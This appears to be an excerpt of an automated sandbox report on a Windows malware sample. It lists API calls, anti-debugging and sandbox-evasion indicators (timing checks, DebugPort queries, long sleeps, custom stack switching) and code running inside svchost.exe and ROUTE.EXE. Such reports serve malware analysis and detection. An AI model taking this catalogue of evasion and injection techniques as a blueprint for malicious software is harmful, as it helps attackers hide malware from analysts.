Code function: 0_2_00C83187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00C83187

Source: C:\Users\user\Desktop\CJE003889.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CJE003889.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\CJE003889.exe	API/Special instruction interceptor: Address: 1016424
Source: C:\Windows\SysWOW64\ROUTE.EXE	API/Special instruction interceptor: Address: 7FFE2220D324
Source: C:\Windows\SysWOW64\ROUTE.EXE	API/Special instruction interceptor: Address: 7FFE2220D7E4
Source: C:\Windows\SysWOW64\ROUTE.EXE	API/Special instruction interceptor: Address: 7FFE2220D944
Source: C:\Windows\SysWOW64\ROUTE.EXE	API/Special instruction interceptor: Address: 7FFE2220D504
Source: C:\Windows\SysWOW64\ROUTE.EXE	API/Special instruction interceptor: Address: 7FFE2220D544
Source: C:\Windows\SysWOW64\ROUTE.EXE	API/Special instruction interceptor: Address: 7FFE2220D1E4
Source: C:\Windows\SysWOW64\ROUTE.EXE	API/Special instruction interceptor: Address: 7FFE22210154
Source: C:\Windows\SysWOW64\ROUTE.EXE	API/Special instruction interceptor: Address: 7FFE2220DA44

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_03B7096E rdtsc

1_2_03B7096E

Source: C:\Users\user\Desktop\CJE003889.exe	API coverage: 5.9 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\ROUTE.EXE	API coverage: 2.6 %

Source: C:\Windows\SysWOW64\ROUTE.EXE TID: 3052	Thread sleep count: 38 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE TID: 3052	Thread sleep time: -76000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe TID: 5220	Thread sleep time: -40000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe TID: 5220	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\ROUTE.EXE	Last function: Thread delayed
Source: C:\Windows\SysWOW64\ROUTE.EXE	Last function: Thread delayed

Source: C:\Users\user\Desktop\CJE003889.exe	Code function: 0_2_00CC445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00CC445A
Source: C:\Users\user\Desktop\CJE003889.exe	Code function: 0_2_00CCC6D1 FindFirstFileW,FindClose,	0_2_00CCC6D1
Source: C:\Users\user\Desktop\CJE003889.exe	Code function: 0_2_00CCC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_00CCC75C
Source: C:\Users\user\Desktop\CJE003889.exe	Code function: 0_2_00CCEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00CCEF95
Source: C:\Users\user\Desktop\CJE003889.exe	Code function: 0_2_00CCF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00CCF0F2
Source: C:\Users\user\Desktop\CJE003889.exe	Code function: 0_2_00CCF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00CCF3F3
Source: C:\Users\user\Desktop\CJE003889.exe	Code function: 0_2_00CC37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00CC37EF
Source: C:\Users\user\Desktop\CJE003889.exe	Code function: 0_2_00CC3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00CC3B12
Source: C:\Users\user\Desktop\CJE003889.exe	Code function: 0_2_00CCBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00CCBCBC
Source: C:\Windows\SysWOW64\ROUTE.EXE	Code function: 6_2_0290CB20 FindFirstFileW,FindNextFileW,FindClose,	6_2_0290CB20

Source: C:\Users\user\Desktop\CJE003889.exe

Code function: 0_2_00C649A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00C649A0

Source: ROUTE.EXE, 00000006.00000002.3491093928.0000000002A5E000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2437331299.0000027BD6B7C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: mcPAaApkdo.exe, 00000007.00000002.3491154712.00000000006BF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlluu

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_03B7096E rdtsc

1_2_03B7096E

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_00417C33 LdrLoadDll,

1_2_00417C33

Source: C:\Users\user\Desktop\CJE003889.exe

Code function: 0_2_00CD3F09 BlockInput,

0_2_00CD3F09

Source: C:\Users\user\Desktop\CJE003889.exe

Code function: 0_2_00C63B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00C63B3A

Source: C:\Users\user\Desktop\CJE003889.exe

Code function: 0_2_00C95A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_00C95A7C

Source: C:\Users\user\Desktop\CJE003889.exe

Code function: 0_2_00C64B37 LoadLibraryA,GetProcAddress,

0_2_00C64B37

Source: C:\Users\user\Desktop\CJE003889.exe	Code function: 0_2_01015080 mov eax, dword ptr fs:[00000030h]	0_2_01015080
Source: C:\Users\user\Desktop\CJE003889.exe	Code function: 0_2_01016690 mov eax, dword ptr fs:[00000030h]	0_2_01016690
Source: C:\Users\user\Desktop\CJE003889.exe	Code function: 0_2_010166F0 mov eax, dword ptr fs:[00000030h]	0_2_010166F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B28397 mov eax, dword ptr fs:[00000030h]	1_2_03B28397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B28397 mov eax, dword ptr fs:[00000030h]	1_2_03B28397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B28397 mov eax, dword ptr fs:[00000030h]	1_2_03B28397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2E388 mov eax, dword ptr fs:[00000030h]	1_2_03B2E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2E388 mov eax, dword ptr fs:[00000030h]	1_2_03B2E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2E388 mov eax, dword ptr fs:[00000030h]	1_2_03B2E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5438F mov eax, dword ptr fs:[00000030h]	1_2_03B5438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5438F mov eax, dword ptr fs:[00000030h]	1_2_03B5438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B4E3F0 mov eax, dword ptr fs:[00000030h]	1_2_03B4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B4E3F0 mov eax, dword ptr fs:[00000030h]	1_2_03B4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B4E3F0 mov eax, dword ptr fs:[00000030h]	1_2_03B4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B663FF mov eax, dword ptr fs:[00000030h]	1_2_03B663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B403E9 mov eax, dword ptr fs:[00000030h]	1_2_03B403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B403E9 mov eax, dword ptr fs:[00000030h]	1_2_03B403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B403E9 mov eax, dword ptr fs:[00000030h]	1_2_03B403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B403E9 mov eax, dword ptr fs:[00000030h]	1_2_03B403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B403E9 mov eax, dword ptr fs:[00000030h]	1_2_03B403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B403E9 mov eax, dword ptr fs:[00000030h]	1_2_03B403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B403E9 mov eax, dword ptr fs:[00000030h]	1_2_03B403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B403E9 mov eax, dword ptr fs:[00000030h]	1_2_03B403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BDE3DB mov eax, dword ptr fs:[00000030h]	1_2_03BDE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BDE3DB mov eax, dword ptr fs:[00000030h]	1_2_03BDE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BDE3DB mov ecx, dword ptr fs:[00000030h]	1_2_03BDE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BDE3DB mov eax, dword ptr fs:[00000030h]	1_2_03BDE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BD43D4 mov eax, dword ptr fs:[00000030h]	1_2_03BD43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BD43D4 mov eax, dword ptr fs:[00000030h]	1_2_03BD43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BEC3CD mov eax, dword ptr fs:[00000030h]	1_2_03BEC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]	1_2_03B3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]	1_2_03B3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]	1_2_03B3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]	1_2_03B3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]	1_2_03B3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]	1_2_03B3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B383C0 mov eax, dword ptr fs:[00000030h]	1_2_03B383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B383C0 mov eax, dword ptr fs:[00000030h]	1_2_03B383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B383C0 mov eax, dword ptr fs:[00000030h]	1_2_03B383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B383C0 mov eax, dword ptr fs:[00000030h]	1_2_03B383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB63C0 mov eax, dword ptr fs:[00000030h]	1_2_03BB63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C0634F mov eax, dword ptr fs:[00000030h]	1_2_03C0634F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2C310 mov ecx, dword ptr fs:[00000030h]	1_2_03B2C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B50310 mov ecx, dword ptr fs:[00000030h]	1_2_03B50310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6A30B mov eax, dword ptr fs:[00000030h]	1_2_03B6A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6A30B mov eax, dword ptr fs:[00000030h]	1_2_03B6A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6A30B mov eax, dword ptr fs:[00000030h]	1_2_03B6A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BD437C mov eax, dword ptr fs:[00000030h]	1_2_03BD437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C08324 mov eax, dword ptr fs:[00000030h]	1_2_03C08324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C08324 mov ecx, dword ptr fs:[00000030h]	1_2_03C08324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C08324 mov eax, dword ptr fs:[00000030h]	1_2_03C08324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C08324 mov eax, dword ptr fs:[00000030h]	1_2_03C08324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB035C mov eax, dword ptr fs:[00000030h]	1_2_03BB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB035C mov eax, dword ptr fs:[00000030h]	1_2_03BB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB035C mov eax, dword ptr fs:[00000030h]	1_2_03BB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB035C mov ecx, dword ptr fs:[00000030h]	1_2_03BB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB035C mov eax, dword ptr fs:[00000030h]	1_2_03BB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB035C mov eax, dword ptr fs:[00000030h]	1_2_03BB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BFA352 mov eax, dword ptr fs:[00000030h]	1_2_03BFA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BD8350 mov ecx, dword ptr fs:[00000030h]	1_2_03BD8350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]	1_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]	1_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]	1_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]	1_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]	1_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]	1_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]	1_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]	1_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]	1_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]	1_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]	1_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]	1_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]	1_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]	1_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB2349 mov eax, dword ptr fs:[00000030h]	1_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B402A0 mov eax, dword ptr fs:[00000030h]	1_2_03B402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B402A0 mov eax, dword ptr fs:[00000030h]	1_2_03B402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C062D6 mov eax, dword ptr fs:[00000030h]	1_2_03C062D6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BC62A0 mov eax, dword ptr fs:[00000030h]	1_2_03BC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BC62A0 mov ecx, dword ptr fs:[00000030h]	1_2_03BC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BC62A0 mov eax, dword ptr fs:[00000030h]	1_2_03BC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BC62A0 mov eax, dword ptr fs:[00000030h]	1_2_03BC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BC62A0 mov eax, dword ptr fs:[00000030h]	1_2_03BC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BC62A0 mov eax, dword ptr fs:[00000030h]	1_2_03BC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6E284 mov eax, dword ptr fs:[00000030h]	1_2_03B6E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6E284 mov eax, dword ptr fs:[00000030h]	1_2_03B6E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB0283 mov eax, dword ptr fs:[00000030h]	1_2_03BB0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB0283 mov eax, dword ptr fs:[00000030h]	1_2_03BB0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB0283 mov eax, dword ptr fs:[00000030h]	1_2_03BB0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B402E1 mov eax, dword ptr fs:[00000030h]	1_2_03B402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B402E1 mov eax, dword ptr fs:[00000030h]	1_2_03B402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B402E1 mov eax, dword ptr fs:[00000030h]	1_2_03B402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]	1_2_03B3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]	1_2_03B3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]	1_2_03B3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]	1_2_03B3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]	1_2_03B3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2823B mov eax, dword ptr fs:[00000030h]	1_2_03B2823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C0625D mov eax, dword ptr fs:[00000030h]	1_2_03C0625D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]	1_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]	1_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]	1_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]	1_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]	1_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]	1_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]	1_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]	1_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]	1_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]	1_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]	1_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]	1_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B34260 mov eax, dword ptr fs:[00000030h]	1_2_03B34260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B34260 mov eax, dword ptr fs:[00000030h]	1_2_03B34260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B34260 mov eax, dword ptr fs:[00000030h]	1_2_03B34260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2826B mov eax, dword ptr fs:[00000030h]	1_2_03B2826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2A250 mov eax, dword ptr fs:[00000030h]	1_2_03B2A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B36259 mov eax, dword ptr fs:[00000030h]	1_2_03B36259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BEA250 mov eax, dword ptr fs:[00000030h]	1_2_03BEA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BEA250 mov eax, dword ptr fs:[00000030h]	1_2_03BEA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB8243 mov eax, dword ptr fs:[00000030h]	1_2_03BB8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB8243 mov ecx, dword ptr fs:[00000030h]	1_2_03BB8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB019F mov eax, dword ptr fs:[00000030h]	1_2_03BB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB019F mov eax, dword ptr fs:[00000030h]	1_2_03BB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB019F mov eax, dword ptr fs:[00000030h]	1_2_03BB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB019F mov eax, dword ptr fs:[00000030h]	1_2_03BB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2A197 mov eax, dword ptr fs:[00000030h]	1_2_03B2A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2A197 mov eax, dword ptr fs:[00000030h]	1_2_03B2A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2A197 mov eax, dword ptr fs:[00000030h]	1_2_03B2A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C061E5 mov eax, dword ptr fs:[00000030h]	1_2_03C061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B70185 mov eax, dword ptr fs:[00000030h]	1_2_03B70185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BEC188 mov eax, dword ptr fs:[00000030h]	1_2_03BEC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BEC188 mov eax, dword ptr fs:[00000030h]	1_2_03BEC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BD4180 mov eax, dword ptr fs:[00000030h]	1_2_03BD4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BD4180 mov eax, dword ptr fs:[00000030h]	1_2_03BD4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B601F8 mov eax, dword ptr fs:[00000030h]	1_2_03B601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]	1_2_03BAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]	1_2_03BAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BAE1D0 mov ecx, dword ptr fs:[00000030h]	1_2_03BAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]	1_2_03BAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]	1_2_03BAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BF61C3 mov eax, dword ptr fs:[00000030h]	1_2_03BF61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BF61C3 mov eax, dword ptr fs:[00000030h]	1_2_03BF61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B60124 mov eax, dword ptr fs:[00000030h]	1_2_03B60124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C04164 mov eax, dword ptr fs:[00000030h]	1_2_03C04164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C04164 mov eax, dword ptr fs:[00000030h]	1_2_03C04164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BDA118 mov ecx, dword ptr fs:[00000030h]	1_2_03BDA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BDA118 mov eax, dword ptr fs:[00000030h]	1_2_03BDA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BDA118 mov eax, dword ptr fs:[00000030h]	1_2_03BDA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BDA118 mov eax, dword ptr fs:[00000030h]	1_2_03BDA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BF0115 mov eax, dword ptr fs:[00000030h]	1_2_03BF0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BDE10E mov eax, dword ptr fs:[00000030h]	1_2_03BDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BDE10E mov ecx, dword ptr fs:[00000030h]	1_2_03BDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BDE10E mov eax, dword ptr fs:[00000030h]	1_2_03BDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BDE10E mov eax, dword ptr fs:[00000030h]	1_2_03BDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BDE10E mov ecx, dword ptr fs:[00000030h]	1_2_03BDE10E
